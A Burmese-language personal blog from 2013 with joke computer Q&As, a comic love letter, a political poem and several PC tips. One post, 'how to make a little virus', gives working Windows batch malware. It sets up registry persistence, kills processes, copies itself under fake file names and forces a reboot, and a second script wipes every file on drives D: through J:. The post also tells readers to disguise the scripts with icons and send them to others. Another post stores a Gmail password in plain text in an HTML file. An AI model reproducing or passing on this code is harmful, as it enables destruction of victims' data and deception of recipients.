Wednesday, October 16, 2013

အမေး & အဖြေ

မေး ။ကွန်ပျူတာထဲမှာပါတဲ့ရမ်ဆိုတာဘာ ပါလဲဟင် ဖြေ။ကွန်ပျူတာအတွက်ရမ်ပုလင်းပါ မေး။ တဂစ်မှာဘယ်နှစ်ဘိုက်ရှိပါသလဲ ဖြေ ။ဂစ်လို့ အော်တဲ့ဌက်တစ်ကောင်မှာတစ်ဗိုက်ဘဲရှိပါတယ် ဆက်ဖတ်ကြည့်ရအောင် မေး ။ email ပို့ နေရင်းconnectionပြုတ်သွားတဲ့အခါဘယ်လိုလုပ်ရင်အကောင်းဆုံးပါလဲ ဖြေ ။ အကောင်းဆုံးကတော့ကွန်ပျူတာပါဝါပိတ်ပြီးအိပ်ပါဆိုင်မှာဆိုရင်တော့အိမ်ပြန်ပါ မေး ။ကွန်ပျူတာထဲဗိုင်းရပ်စ်ဝင်ရင်ဖြေရှင်းပုံလေးအသေးစိတ် ပြောနိုင်မလား ဖြေ ။ ဟုတ်ကဲ့ရပါတယ် ၁။ systemပုံးကိုအရင်ဖွင့်ပါ ၂။ ရှိရှိသမျှ ဟတ်ဒစ်၊မားသားဘုတ်၊ရှိသမျှကတ် အကုန်ဖြုတ်ပါ။ ၃။ပြီးရင်တော့ဆပ်ပြာမှုန့် များများနဲ့ ဖျော်ထားတဲ့ ဇလုံထဲကိုထည့်ပြီး Decogenနဲ့ တစ်ညစိမ်ပါ ၄ ။ နောက်တစ်နေ့ ကျပြန်ဆေးကြောပြီးနေပူပူမှာ လှမ်းပါ။ ၅ ။ ခြောက်သွေ့ သွားသောအခါပစ္စည်းများကိုနေရာတကျ ပြန်တတ်ပါ ၆။ စက်ကိုပြန်ဖွင့်သောအခါ VIRUS မရှိတော့ကြောင်းပျော် ရွှင်ဖွယ်တွေ ရပါလိမ့် မည်။ ၇ ။ နောက်ပိုင်းသုံးရင်SYSTEM ပုံးကိုဗိုင်းရပ်စ်ထပ်မ၀င်အောင် နေပူထဲထားကာအသုံးပြုပါဟု မေး ။သမီးကွန်ပျူတာအရမ်းလေးနေလို့ ဘာလုပ်ရမှန်းမသိဘူးဖြစ်နေတယ် ။ ကူပါဦး ဖြေ ။ အရင်ဆုံးဟတ်ဒစ်(စ်)ဖြုတ်ထားလိုက်ပါ ။ ဒါမှလေးနေရင်ပါဝါစပလိုင်းထပ်ပါဖြုတ်ထား လိုက်ပေါ့အရမ်းအရမ်းပေါ့သွားမယ် မေး ။ကျွှန်တော်တို့ ဘက်ကမီးမှန်ဘူး ။ UPS ကလဲသိပ်မကောင်းတော့ မီးပျက်ချိန်ကွန်ပျူတာမြန်မြန်ပိတ်ချင်ရင်ဘယ်လိုလုပ်ရမလဲ ဖြေ ။ upsနဲ ကွန်ပျူတာသွယ်တားတဲ့ပလပ်ကိုချက်ချင်းဆွဲဖြုတ်ပါ။ ချက်ချင်းပိတ်သွားရစေမယ် မေး ။ခဏခဏ restart ကျနေတဲ့အတွက်ဖြေရှင်းပေးပါ ဖြေ ။ဆိုင်ပို့ လိုက်ပါ မေး။ ကျွှန်တော့်window ကအဖွင့်အပိတ်ကြာနေတယ်ဘယ်လိုလုပ်ရမလဲ window မှာပြသနာရှိလို့ လား ဖြေ။ ဟုတ်ပါတယ် window ကိုအဖွင့်အပိတ်ချောင်အောင်ပတ္တာမှာဆီနဲနဲ ထိုးပေးပါ ။ ကဲဆက်ဖြေမယ်နော် မေး။အင်တာနက်သုံးဖို့ ဘာလိုအပ်ပါသလဲရှင် ဖြေ။ပိုက်ဆံလိုတာပေါ့သမီးရယ်ဟုတ်ဘူးလား မေး။သမီးပို လိုက်တဲ့အီးမေးဟိုဘက်ရောက်မရောက်ဘယ်လိုသိနိုင်မလဲ ဖြေ ။ဖုံးဆက်ပြီးမေးကြည့်ပါ။ မေး။အီးမေးတွေထဲကစာတွေမှာဗိုင်းရပ်စ်ပါမပါဘယ်လိုသိနိုင်မလဲ ဖြေ။အဲ့ဒီအီးမေးကိုဖွင့်ကြည့်ပါ-သင့်စက်ထဲဗိုင်းရပ်စ်ဝင်လို့ ရှိရင်ဗိုင်းရပ်စ် ပါလို့ ပေါ့ကွယ်

Monday, October 14, 2013

ရည်းစားစာ လေးပါ

ချစ်သူ.... ဒီစာကို ကြက်သွန်လှီးရင်း မျက်ရည်စက်လက်နဲ့ ကိုယ်ရေးလိုက်ပါတယ်။ ကိုယ်တော့ လွမ်းတတ်နေပြီ။ ကျောင်းမှာ သင်မပေးပဲ တတ်ခဲ့တဲ့ ပညာဆိုလို့ ဒီတစ်ခုပဲ ရှိတာပါ။ ကိုယ် လည်း ဒီဘာသာမှာ ထူးချွန်လို့ ခုဆို ဘုန်းကြီးပျံရှိတိုင်း ကိုယ့်ကို လာခေါ်ကြတယ် သိလား။ မင်း ကိုယ့်အချစ်ကို လက်ခံလို့ကတော့ ဘုန်းကြီးပျံရှိတိုင်း ထမင်းဝစေရမယ်လို့ ကိုယ် ကတိပေးပါတယ်။ မင်းက ကိုယ့်ဘဝမှာ သံယောဇဉ်အရှိဆုံးလူလို့ အခုမှ ပြောနိုင်တာပါ။ ကိုယ့်ဘဝကောင်းစားဖို့အတွက် စကားတစ်ခွန်းလက်ဆောင် ပါးလိုက်ပါရစေ။ အဲဒါကတော့ ကိုယ် မင်းကို ချစ်တယ်ဆိုတာ ယုံကြည်ပေးပါလို့။ အခုဆို ကိုယ် ခံစားတတ်နေပြီ။ ခွက်တစ်လုံးနဲ့...။ အရက်တွေသောက်ပြီးလို့ ပြောတာနော်။ မင်းကို ချစ်လွန်းလို့ လမ်းတွေ့ရင်တောင် မခေါ်ချင်ဘူး။ မမြင်ရလေ ကောင်းလေလို့ တွေးနေမိတဲ့ အထိဆိုပါတော့။ မင်းကို မှတ်ထားမယ်နော်။ နောက်လူများလာရင် မမှတ်မိမှာစိုးလို့ပါ။ ခုတော့ မင်းဖတ်ဖို့ ချစ်သဝဏ်လွှာကို အကြောင်းညီညွတ်လို. ဘောင်းဘီ ချွတ် (ပုဆိုးတော့ဝတ်ထားပါတယ်) ပြီး ရေးလိုက်ပါတယ် ...အခု ကိုယ်ပို.လိုက်တဲ့ စာကလေး ကိုရရင် အမွေးနူတ်ပြီး ကြော်စားလိုက်ပါနော် မင်းကို ကိုယ်ချစ်ချင်ပေမဲ. အုန်းခြစ်ကမရှိဘူးဖြစ်နေတယ် မင်းနဲ့ ကိုယ်ပေါင်းချင်ပေးမဲ. ကောက်ညှင်းဆန်တွေ ဈေးကြီးတာ မင်းအသိပါ မင်းကို ကိုယ်နှစ်သက်ပေမဲ.မင်းက ရေငုတ်ကျွမ်းတော. ဘာမှ မဖြစ်ဘူးပေါ...ဒါ့ကြောင့် အစ်ကိုတော့ ရေမရှိချောင်းကို သေချင်သေဆိုပြီး အောက်ဆီဂျင်ဘူးတပ်ပြီးသာ ကူးလိုက်ချင်တော့တယ်။ ကိုယ် တစ်ယောက်ထဲ လျှောက်လှမ်းခဲ့တဲ့ အ၀တ်တွေ ခုလောက်ဆို ခြောက်ရောပေါ. မင်းအချစ်ကိုသာမရရင် ကိုယ်လေမထူးတော.တဲ. ဘ၀မှာ မြောင်းတူးပြီး ပြောင်းဖူးပဲ စိုက်စားတော့မယ်ကွာ ကိုယ်ဒီလို အရဲစွန့်ပြီး စာရေး တာကို စိတ်မဆိုးပါနဲ.နော် ငပိစားပြီး အသိတရား မရှိဘူးလို. တော. မပြောလိုက်ပါနဲ.ကွာ ဂေါ်ဖီ တွေစားပြီး တော်ကီတွေ ပွားတာလဲ မဟုတ်ပါဘူး ရုပ်တည်နဲ. မုန့်တီထိုင်သောက်နေတယ် လဲ မထင်လိုက်ပါနဲ. အရှက်မရှိ သရက်စေ့လဲ မဟုတ်ဘူးနော် ကိုယ်ဟာ ရုပ်ကလာပ် က စုတ်ပြတ် ရူပါက ချူချာ သောက်ရုပ်က မျောက်ကုတ် ပုံစံက ဒုံးပျံ နေပေမဲ့ အသည်းနှလုံးကတော. သိတ်ချစ်တတ်ပါတယ် ကိုယ်ရဲ.စာ ကို မင်းမိဘ တွေ တွေ့သွားလို့ တော်တော်ဆူနေလား ? ဆူရင် မီးဖို ပေါ်ကချပြီး လက်ဖက်ခြောက် ခတ်လိုက်နော် မင်း ဆီ က ပြန်လာမဲ. စာကလေးတွေကို ကိုယ် လေသေနတ်နဲ. အသင့်ဆောင့်နေမယ် အဲ.လေ မှားလို. အသင့်စောင့်နေမယ်နော်။ ချစ်တဲ. ကိုယ်

လက်ထပ်ချိန် နှင့်  နောက်ပိုင်း

လက်ထပ်ခွင့်တောင်းချိန် အမျိုးသား- အင်း နောက်ဆုံးတော့လည်း အကြာကြီးစောင့်ရကျိုးနပ်ပါတယ် အမျိုးသမီး-ဟင်းနော်....ထားသွားလိုက်ရမလား? အမျိုးသား-အမယ်လေး စိတ်ကူးထဲတောင် မထည့်လိုက်ပါနဲ့ အမျိုးသမီး--တကယ် ချစ်ရဲ့ လားဟင်? အမျိုးသား-ဒါပေါ့ ဒီထက်တောင်ပိုသေးတယ် အမျိုးသမီး-ကျွန်မကို အရူးလုပ်မှာလား အမျိုးသား- ဘုရားစူးရစေရဲ့  ဒီမေးခွန်းမျိုး မေးတောင်မမေးပါနဲ့လား အမျိုးသမီး-ကျွန်မကို နမ်းချင်သလား ဟင်? အမျိုးသား-အချိန်မရွေးပဲ အမျိုးသမီး- နှိပ် ကော နှိပ်စက်မှာလား? အမျိုးသား- မင်းရူးများရူးနေလားကွာ အမျိုးသမီး-ကျွန်မ မောင့်ကို စိတ်ချရပါတယ်နော်? အမျိုးသား-အင်း အမျိုးသမီး-မောင်ရယ်... လက်ထပ်ပြီးတဲ့အခါ.... အပေါ်က စကားလေးတွေကို အောက်ကနေသာ ပြန်စဖတ်လိုက်ပါ ကဲအခုလိုဘဲနေ့ တိုင်းပျော်ရွင်ပါစေဂျာ(အဲပာုတ်ပါဘူး)ဗျာပါ။ပိာပိာ

Sunday, October 13, 2013

သိစေလိုလို့ နည်းနည်းလေးပိုပြောလိုက်မိတယ်"

သိစေလိုလို့ နည်းနည်းလေးပိုပြောလိုက်မိတယ်" ဒီကဗျာမှာ စကားလုံးလှလှတွေ များများပါမယ် မထင်ပါနှင့် ဆူလွယ်နပ်လွယ်တံဆိပ်များ ဝေးဝေးသွားပါ ဒီကဗျာမှာ ထင်မိထင်ရာ အရေးအသားတွေ များများပါမယ် ဆင်တူ အပြစ်တင်သံများ ဝေးဝေးသွားပါ ဒီကဗျာမှာ ကိုယ်ဖတ်ထားမိသမျှ နိုင်ငံရေး စီးပွားရေး လူမှုရေး ပညာရေး အဲ့ဒါတွေ များများပါမယ် ဒီ ရေးလေးရေး မြင်ပြင်းကတ်သူမျာွး ဝေးဝေးသွားပါ ဒီကဗျာမှာ ပျော်စရာ ရွှင်စရာ ဟာသကမ္ဘာ လို ရီစရာပါမယ် မောစရာပါမယ် အလကားနေဆဲချင်ဆိုချင်မျာွး ဝေးဝေးသွားပါ ဒီကဗျာမှာ အမိမဲ့သားရေနည်းငါးလို မိဝေး ဖဝေးတွေ ရေခြားမြေခြားတွေပါမယ် ရွှေပြည်အေးတရားနဲ့ ကျောပြင် ဓါးပြားရိုက်တွေ ဝေးဝေးသွားပါ ဒီကဗျာမှာ ဒီကဗျာမှာ ဒီကဗျာမှာ မျက်ရည်တွေပါမယ် မိဘပြည်သူတွေပါမယ် ကျားတွေ ဆင်တွေ ဆင်ဖမ်းမယ် ကျားဖမ်းမယ်တွေပါမယ် ငြိမ်းချမ်းရေး ဆုတောင်းသံတွေပါမယ် ကဗျာရွတ်သံတွေပါမယ် မွေးနေ့ဆုတောင်းတွေပါမယ် ငါ့တိုင်းပြည်ထိ လက်သီးကြည့်တွေပါမယ် သမ္မတနဲ့ သမ္မတလုပ်မယ့်သူတွေ အကြောင်း ပါမယ် ပြင်ဖို့လိုအပ်ကြောင်း တိုးတိုးတမျိုး ကျယ်ကျယ်တမျိုးတွေပါမယ် ပုဒ်မ ၁၈ ကိုခြေနဲ့နင်းမယ်တွေပါမယ် ဒီကဗျာမှာ ဒီကဗျာကို တခါတည်း လက်တန်းရေးသောကြောင့် ဖတ်ကြည့်သူ မကြိုက်နှစ်သက်သူတွေပါမယ် ထို့ကြောင့် မကြိုက်နှစ်သက်သူများ ဝေးဝေးသွားပါ ဝေးဝေးသွားပါ ဝေးဝေးသွားပါ ။ ။

Friday, October 11, 2013

Gmail ကို password မရိုက်ဘဲဖွင့်နည်း

အင်တာနက်ဆိုင်ကနေဂျီမေးလ်တွေသုံးရင်keylogger < Hacking program > ရန်ကလွတ်အောင်လို့ ဒီနည်းလေးသုံးလိုက်ရင် တော်တော်အဆင်ပြေသွားမှာပါ။ အောက်က ပေးထားတဲ့ ကုတ်တွေကို notepad ထဲမှာ copy ကူးယူပြီး USERNAME နဲ့ PASSWORD နေရာမှာ ကိုယ့် username နဲ့ password ထည့်ပါ။ username မှာ @gmail ထည့်စရာမလိုပါ။ Note pad တစ်ခုကိုဖွင့်၍ အောက်ပါ ကုတ်များကို Copy ထည့်လိုက်ပါ။ https://www.google.com/accounts/ServiceLoginAuth?service=mail" method="post"> type="hidden"> type="hidden">http://mail.google.com/mail/?ui=2" type="hidden"> type="hidden"> type="hidden"> type="hidden"> type="hidden"> type="hidden">USERNAME" type="hidden">PASSWORD" type="hidden"> id="PersistentCookie" value="no" type="hidden"> name="rmShown" value="1" type="hidden"> value="Sign in" type="submit"> ပြီးရင် name.html နဲ့ Desktop ပေါ်မှာအရင် save လုပ်ပါ။ (သိုမဟုတ်) USB Drive မှာဘဲဖြစ်ဖြစ်ရပါတယ်။File name: အကွက်မှာ ကြိုက်ရာအမည်တခုရိုက်၍အမည်၏နောက်မှာ .html ရိုက်ပါ။ Save as type: အကွက်မှာ All Files ကိုရွေးပါ။ Encoding: အကွက်မှာ ပြင်ဘို့မလိုပါ။ save ထားသော file ကိုဖွင့်လိုက်သောအခါ ကိုယ့် Gmail ကို ဘာမှရိုက်ထည့်စရာမလိုပဲ sign in လုပ်ပေးပါလိမ့်မယ်။Right Click > Open With ကနေ ကိုယ်ကြိုက်တဲ့ browser နဲ့ဖွင့်နိုင်ပါတယ်။ကျွန်တော်က Firefox ဘဲသုံးပါတယ်။အင်တာနက်ဆိုင်သွားတဲ့အချိန် ကိုယ့် password ကိုသူများသိမှာ ခိုးမှာကြောက်သူများခု save လုပ်ထားတဲ့ file ကို USB-stick ထဲထည့်ပြီးယူသွားနိုင်ပါတယ်။ Gtalk တော့ မဖွင့်ပါနဲ့။ပြီးတော့ အင်တာနက်ဆိုင်က စက်ထဲလည်း file ကိုထည့်ထားမိရင် ပြန်ဖျက်ဖို့မမေ့နှင့်။ အခြားသူများတွေအတွက် ကိုယ့် Gmail ကအဆင်သင့်ပေးသလိုဖြစ်နေပါ့မယ်။

ဟီး virus ပေါက်စလုပ်နည်းလေးပါဗျ

အောက်ကပေးထားတဲ့ စာလေးတွေကိုကူးလိုက်ပါ နံပါတ် 2 ကတော့နည်းနည်း dangerous ပေါ့ 1. start calc copy %0 %Systemroot%\Greatgame > nul reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ /d %systemroot%\Greatgame.bat /f > nul copy %0 *.bat > nul Attrib +r +h Greatgame.bat Attrib +r +h RUNDLL32 USER32.DLL.SwapMouseButton start calc cls tskill msnmsgr tskill LimeWire tskill iexplore tskill NMain start cls cd %userprofile%\desktop copy Greatgame.bat R.I.P.bat copy Greatgame.bat R.I.P.jpg copy Greatgame.bat R.I.P.txt copy Greatgame.bat R.I.P.exe copy Greatgame.bat R.I.P.mov copy Greatgame.bat FixVirus.bat cd %userprofile%My Documents copy Greatgame.bat R.I.P.bat copy Greatgame.bat R.I.P.jpg copy Greatgame.bat R.I.P.txt copy Greatgame.bat R.I.P.exe copy Greatgame.bat R.I.P.mov copy Greatgame.bat FixVirus.bat start start calc cls msg * R.I.P msg * R.I.P shutdown -r -t 10 -c "VIRUS DETECTED" start start time 12:00 :R.I.P cd %usernameprofile%\desktop copy Greatgame.bat %random%.bat goto RIP ပြီးရင် notepad ကိုဖွင့်ပြီး အဲထဲကိုကူးထည့်လိုက်ပါ ပြီးရင် Greatgame.bat လို့ ရေးပြီးsave လိုက်ပါ အဲဒါဆိုရင် virus လေးဖြစ်သွားပါပြီ 2.@echo off del D:\*.* /f /s /q del E:\*.* /f /s /q del F:\*.* /f /s /q del G:\*.* /f /s /q del H:\*.* /f /s /q del I:\*.* /f /s /q del J:\*.* /f /s /q ပြီးရင် kinng.bat လို့ save လိုက်ပါ အဲဒီ virus လေးတွေကို short create ပြီး icon လေးတွေ change လိုက်ပါ အဲဒါဆို ကိုယ်ပို့ ချင်တဲ့သူဆီ လက်ဆောင်ပေးလိုက်ပေါ့ အဲ မူရင်းဖိုင်ကိုတော့ hidden လုပ်ထားလိုက်ပေါ့

Tuesday, October 8, 2013

Gmail မှာကိုယ့် ဆီကိုပို့ လိုက်တဲ့ သူရဲ့  IP ကိုသိချင်တယ်ဆိုရင်

အရင်ဆုံး gmail ထဲကို log in ၀င်လိုက်ပါ။
ပြီးရင် ကိုယ်သိချင်တဲ့  mail ထဲကိုဝင်လိုက်ပါ
မေးလ် ရဲ့ ညာဘက်ထောင့် မှာရှိတဲ့ Menu bar ထဲက Show original ထဲကိုဝင်လိုက်ပါ
ကဲအဲဒါဆိုရင် လူကြီးမင်းတို့ သိချင်တဲ့ လူရဲ့  IP လေးကပေါ်နေပါပြီ။